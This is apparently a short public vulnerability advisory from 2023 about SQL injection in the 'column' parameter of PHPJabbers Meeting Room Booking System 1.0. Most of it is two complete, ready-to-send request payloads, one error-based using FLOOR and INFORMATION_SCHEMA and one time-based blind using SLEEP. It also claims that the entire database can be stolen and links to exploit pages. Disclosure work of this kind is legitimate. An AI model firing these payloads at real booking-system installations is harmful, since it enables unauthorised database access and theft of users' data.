## Title: Meeting Room Booking System-1.0 Multiple - SQLi ## Author: nu11secur1ty ## Date: 09/06/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The column parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the column parameter, and a database error message was returned. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: column (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT 6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT (ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html) ## Time spent: 01:47:00